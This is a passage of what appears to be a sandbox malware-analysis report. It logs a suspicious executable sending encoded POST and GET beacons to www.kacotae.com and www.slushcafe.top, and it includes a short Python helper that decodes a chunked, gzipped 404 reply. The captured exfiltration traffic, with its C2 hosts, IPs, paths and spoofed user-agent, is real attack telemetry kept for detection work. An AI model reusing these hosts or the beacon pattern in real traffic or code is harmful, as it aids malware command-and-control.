                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:11.048937082 CEST | 716 | OUT | POST /rdfm/ HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.kacotae.com
                                                      Referer: http://www.kacotae.com/rdfm/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 32 67 43 70 31 4a 4c 49 47 64 57 46 65 6b 50 49 6a 37 4e 69 33 6b 36 47 37 6c 32 4b 37 52 6f 43 2b 72 2f 45 79 52 6b 52 49 72 58 6b 5a 48 55 63 66 34 31 6e 52 57 30 75 51 32 55 61 57 5a 67 77 65 49 34 6a 74 4f 68 59 33 54 6a 74 55 73 44 64 69 7a 4e 65 2f 4a 6a 58 68 57 36 44 69 70 41 76 6f 57 30 42 6c 58 59 4a 69 73 6b 61 5a 54 30 56 39 54 62 4f 2b 4e 7a 7a 45 2f 6c 61 39 53 63 39 56 54 69 43 32 5a 30 50 56 34 4f 59 59 75 38 38 45 59 64 4d 78 35 59 32 47 32 4a 7a 70 58 49 2b 68 48 50 42 6c 6f 6f 67 3d 3d
                                                      Data Ascii: dZo=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/q2gCp1JLIGdWFekPIj7Ni3k6G7l2K7RoC+r/EyRkRIrXkZHUcf41nRW0uQ2UaWZgweI4jtOhY3TjtUsDdizNe/JjXhW6DipAvoW0BlXYJiskaZT0V9TbO+NzzE/la9Sc9VTiC2Z0PV4OYYu88EYdMx5Y2G2JzpXI+hHPBloog==
                                                      Aug 18, 2024 18:26:11.700546980 CEST | 361 | IN | HTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:11 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.9 | 54133 | 64.226.69.42 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:13.612517118 CEST | 1729 | OUT | POST /rdfm/ HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.kacotae.com
                                                      Referer: http://www.kacotae.com/rdfm/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 75 67 42 61 74 4a 4b 72 75 64 56 46 65 6b 52 59 69 38 4e 69 32 6b 36 47 6a 68 32 4b 32 6d 6f 41 47 72 2b 6e 71 52 73 46 6b 72 65 6b 5a 48 49 73 66 37 37 48 52 44 30 75 41 36 55 62 6d 5a 67 77 65 49 34 6c 52 4f 79 70 33 54 6c 74 55 76 45 64 69 2f 63 4f 2f 31 6a 58 4a 47 36 44 6e 55 41 37 63 57 7a 67 56 58 65 37 61 73 73 61 5a 52 31 56 38 4d 62 4f 69 53 7a 7a 5a 45 6c 61 4a 72 63 36 5a 54 67 33 47 42 6a 4f 68 44 55 4b 55 47 2b 75 67 4c 45 37 38 61 58 55 44 73 51 52 52 6d 52 73 73 57 63 7a 34 51 38 70 4a 35 5a 33 59 76 6a 36 36 6c 6f 49 49 48 79 50 6d 4b 33 6e 2b 77 65 65 4a 5a 42 4e 61 37 47 35 44 74 67 4c 61 34 49 51 61 6b 52 34 2b 66 30 74 69 50 30 56 76 50 6c 70 33 72 62 43 4a 58 49 44 6c 57 6d 47 49 35 61 64 49 33 39 51 4b 48 34 35 45 33 43 32 69 48 4b 64 72 4b 6b 4e 57 76 39 68 77 7a 64 4e 72 74 2f 50 6a 54 57 34 62 71 41 7a 64 31 58 35 36 73 58 5a 66 33 43 75 [TRUNCATED]
                                                      Data Ascii: dZo= [TRUNCATED]
                                                      Aug 18, 2024 18:26:14.261090994 CEST | 361 | IN | HTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:14 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
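The two replies above (and the tail of session 21 before them) arrive chunked and gzip-compressed, so the report's "Data Ascii" rendering is unreadable. The following is an added example, not part of the Joe Sandbox report, showing how to recover the body from the "Data Raw" hex: strip the HTTP/1.1 chunk framing, then gunzip. The hex constant is copied from the session-23 response; the `dechunk` and `recover_body` helper names are this example's own.

```python
"""Recover a chunked, gzip-encoded HTTP body from a sandbox 'Data Raw' hex dump.

Added example (not from the report). Input: the session-23 response bytes
exactly as the report prints them: chunk-size line "ac\r\n", 172 bytes of
gzip data, "\r\n", then the last-chunk "0\r\n\r\n".
"""
import gzip

# Copied from the report's Data Raw line for the session-23 response.
RESPONSE_RAW_HEX = (
    "61 63 0d 0a "
    "1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 "
    "7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 "
    "c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 "
    "d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa "
    "2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c "
    "9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 "
    "0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 "
    "bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 "
    "fc f2 17 4f 11 d4 0d c8 28 02 00 00 "
    "0d 0a 30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Reassemble a chunked transfer-coded body (RFC 9112, section 7.1).

    Each chunk is "<hex size>[;ext]\\r\\n<size bytes>\\r\\n"; a size of 0
    marks the last chunk. Trailer fields after it are ignored.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            break
        out += data[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk-data
    return bytes(out)


def recover_body(raw_hex: str) -> dict:
    """Parse the hex dump, de-chunk it and gunzip the result.

    gzip.decompress verifies the CRC32 and ISIZE trailer, so a mistyped
    byte in the dump raises instead of returning garbage.
    """
    wire = bytes.fromhex(raw_hex)
    compressed = dechunk(wire)
    # Last four bytes of a gzip member are ISIZE, the uncompressed length.
    isize = int.from_bytes(compressed[-4:], "little")
    body = gzip.decompress(compressed)
    return {"chunk_bytes": len(compressed), "gzip_isize": isize, "body": body}


if __name__ == "__main__":
    result = recover_body(RESPONSE_RAW_HEX)
    print(result["chunk_bytes"], result["gzip_isize"])
    print(result["body"].decode("utf-8", errors="replace"))
```

The chunk-size line "ac" is 172 bytes, matching the gzip member, and the trailer's ISIZE reads 552, the same length as the uncompressed openresty 404 page the server returns in session 24. The same routine applies to any "Data Raw" line whose headers carry both `Transfer-Encoding: chunked` and `Content-Encoding: gzip`.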


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.9 | 54134 | 64.226.69.42 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:16.138067007 CEST | 437 | OUT | GET /rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.kacotae.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:16.777698040 CEST | 699 | IN | HTTP/1.1 404 Not Found
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:16 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 552
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.9 | 54135 | 203.161.55.102 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:22.000504017 CEST | 698 | OUT | POST /irn0/ HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.slushcafe.top
                                                      Referer: http://www.slushcafe.top/irn0/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 39 57 36 57 4d 4c 6a 61 62 38 2b 48 69 58 32 66 55 58 48 50 49 42 4c 47 2b 51 6a 57 47 58 6d 45 68 50 4a 2b 55 66 35 71 32 52 70 6f 38 59 53 72 76 78 55 52 43 4c 56 31 33 67 76 59 41 57 75 39 56 7a 73 46 64 68 68 66 64 64 4c 6e 43 58 6b 46 50 75 6f 5a 32 45 6d 75 63 4a 46 33 63 59 73 77 48 62 46 6d 50 58 56 49 45 67 5a 52 62 33 54 6f 37 67 43 67 45 66 65 38 78 62 69 71 42 55 6e 50 4b 77 2f 4a 75 63 37 55 6d 38 52 6b 46 77 54 43 39 4e 2b 55 4e 62 35 41 38 52 75 73 77 72 44 70 45 76 70 35 68 6b 48 56 2b 33 45 37 33 34 74 46
                                                      Data Ascii: dZo=mmMV1xSFqhYG9W6WMLjab8+HiX2fUXHPIBLG+QjWGXmEhPJ+Uf5q2Rpo8YSrvxURCLV13gvYAWu9VzsFdhhfddLnCXkFPuoZ2EmucJF3cYswHbFmPXVIEgZRb3To7gCgEfe8xbiqBUnPKw/Juc7Um8RkFwTC9N+UNb5A8RuswrDpEvp5hkHV+3E734tF
                                                      Aug 18, 2024 18:26:22.591425896 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:22 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      26 | 192.168.2.9 | 54136 | 203.161.55.102 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:24.531580925 CEST | 722 | OUT | POST /irn0/ HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.slushcafe.top
                                                      Referer: http://www.slushcafe.top/irn0/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 43 45 68 76 35 2b 56 65 35 71 7a 52 70 6f 6f 6f 53 75 69 52 55 47 43 4c 5a 54 33 69 4c 59 41 57 36 39 56 79 63 46 64 51 68 63 63 4e 4c 6c 4f 33 6b 48 4c 75 6f 5a 32 45 6d 75 63 4a 52 52 63 59 55 77 48 6f 64 6d 41 53 70 4a 59 51 5a 57 53 58 54 6f 74 51 44 70 45 66 65 4f 78 61 75 45 42 53 37 50 4b 79 33 4a 75 49 76 56 78 73 52 71 59 41 53 67 30 39 62 34 4e 62 67 63 32 67 69 47 6f 4a 48 51 4f 75 4a 6e 77 57 4f 4f 72 67 45 63 77 66 6b 74 6e 48 62 68 58 6a 65 56 46 75 68 77 77 38 30 65 78 65 33 6a 73 41 3d 3d
                                                      Data Ascii: dZo=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlCEhv5+Ve5qzRpoooSuiRUGCLZT3iLYAW69VycFdQhccNLlO3kHLuoZ2EmucJRRcYUwHodmASpJYQZWSXTotQDpEfeOxauEBS7PKy3JuIvVxsRqYASg09b4Nbgc2giGoJHQOuJnwWOOrgEcwfktnHbhXjeVFuhww80exe3jsA==
                                                      Aug 18, 2024 18:26:25.374361992 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:25 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      27 | 192.168.2.9 | 54137 | 203.161.55.102 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:27.060240984 CEST | 1735 | OUT | POST /irn0/ HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.slushcafe.top
                                                      Referer: http://www.slushcafe.top/irn0/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 4b 45 67 65 5a 2b 55 35 6c 71 30 52 70 6f 72 6f 53 76 69 52 56 45 43 49 70 50 33 69 32 6c 41 53 4b 39 55 52 45 46 66 6a 35 63 58 4e 4c 6c 47 58 6b 47 50 75 6f 4d 32 41 36 69 63 4a 42 52 63 59 55 77 48 75 78 6d 4a 6e 56 4a 4c 41 5a 52 62 33 54 6b 37 67 43 4d 45 66 58 35 78 61 36 36 42 45 4c 50 45 78 66 4a 68 64 37 56 79 4d 52 6f 62 41 53 47 30 39 6e 6e 4e 62 4e 6c 32 67 57 73 6f 4c 6e 51 50 6f 38 6f 68 43 4b 30 76 6a 30 76 34 63 4d 39 70 33 57 4a 58 43 43 53 62 37 39 56 6a 50 42 58 6b 65 75 36 7a 6d 61 65 30 57 4f 74 6a 49 36 43 52 35 59 74 35 6b 79 4e 46 74 72 65 56 53 2f 63 37 39 4f 65 63 32 48 68 54 69 63 7a 43 64 36 64 73 74 47 69 4f 4e 71 30 36 51 6c 71 59 4a 34 6b 72 75 4c 72 49 6a 4b 30 62 34 79 30 45 52 6b 2f 5a 4a 4f 4f 48 44 2f 67 67 41 38 75 72 32 4b 33 44 49 71 51 50 61 6f 59 61 78 47 73 69 52 6c 30 43 67 66 51 4d 43 52 38 58 57 6f 54 35 76 37 55 54 78 [TRUNCATED]
                                                      Data Ascii: dZo=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlKEgeZ+U5lq0RporoSviRVECIpP3i2lASK9UREFfj5cXNLlGXkGPuoM2A6icJBRcYUwHuxmJnVJLAZRb3Tk7gCMEfX5xa66BELPExfJhd7VyMRobASG09nnNbNl2gWsoLnQPo8ohCK0vj0v4cM9p3WJXCCSb79VjPBXkeu6zmae0WOtjI6CR5Yt5kyNFtreVS/c79Oec2HhTiczCd6dstGiONq06QlqYJ4kruLrIjK0b4y0ERk/ZJOOHD/ggA8ur2K3DIqQPaoYaxGsiRl0CgfQMCR8XWoT5v7UTx30rFpBv/PAxYjHX5Beg6vvKUeU+W3s4DaDLskCVCpZzKQ3hUvXR4dlOvFfxsGU3PKuuczx+sG0KWhyMy9PfHnAzUJpaFRow5vYfIH0CskZzv0+TM4liN3EHz/K31AvOxf3lXMqdug5KoXvqFbldgP0Lzj4pmoXhRuN1xe3DvyvzMFyz01jJNHk69VUY9+neTDr844+T5nEHlOupEl91RXLvgZns2fzDRix3P8RXTFtsCN0CaBzHuwQAPRmUHKY51QGS+VcOrMSkXMzv5NOFbcy7yfpvwV8tIR1keZku+THEDrdPbTfwinlbOy3Uf4ZGJzQs8YgaQSBiNw4IEwNqs9tw8pS1pLuYIUNgc57ZtQHza3ueXQ0AoBxzDb7Gi4MeJGfk2K10MyuGvwdiQLB2x7bWfD6wWFHiQX19dYtre1sWiyYh0VdRYJCgJ26sjv5hb3NuTDu9qVv6hm7dCNfIK3+1LmPm/OyAVfownp4bCurCWENVfACIlJvqUWxuQp/xy46Iu33M0DCdHQf3RSY7IHS8JRS7/tXTPRGoOBMi6GyxOksrBqLfeUf0NO2nfXm/i5jzba50vRo0IBdi116gd0rvwPTKndsSIROXiwrhHs+0Hkpupj/5pfa7D5BUxZERxlkbNy9KmzihR7fw7wlolZKJLQPBvUbf9Ip [TRUNCATED]
                                                      Aug 18, 2024 18:26:27.651304007 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:27 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
